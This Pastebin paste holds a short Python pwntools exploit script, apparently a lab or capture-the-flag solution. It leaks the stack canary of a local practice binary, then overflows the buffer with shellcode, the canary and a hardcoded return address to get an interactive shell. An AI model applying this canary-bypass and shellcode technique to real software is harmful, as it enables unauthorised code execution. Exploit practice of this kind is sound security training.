SHARE
TWEET

Untitled

a guest Nov 21st, 2019 111 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2. with open("shellcode", "rb") as f:
  3.     shellcode = f.read()
  4.  
  5. r = process("./bof_canary_execstack", aslr=False)
  6.  
  7. gdb.attach(r)
  8. sleep(0.3)
  9. msg = b"a" * 0x39
  10. r.sendline(str(len(msg)))
  11. r.send(msg)
  12.  
  13. r.recvn(len(msg))
  14. canary = r.recvn(7)
  15. canary = b"\x00" + canary
  16. info("canary: 0x{:016x}".format(u64(canary)))
  17. r.clean()
  18.  
  19. msg = shellcode
  20. msg = msg.ljust(0x38, b"a")
  21. msg += canary
  22. msg += p64(0)
  23. msg += p64(0x7fffffffe1d0)
  24.  
  25. r.sendline(str(len(msg)))
  26. r.send(msg)
  27.  
  28. r.interactive()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top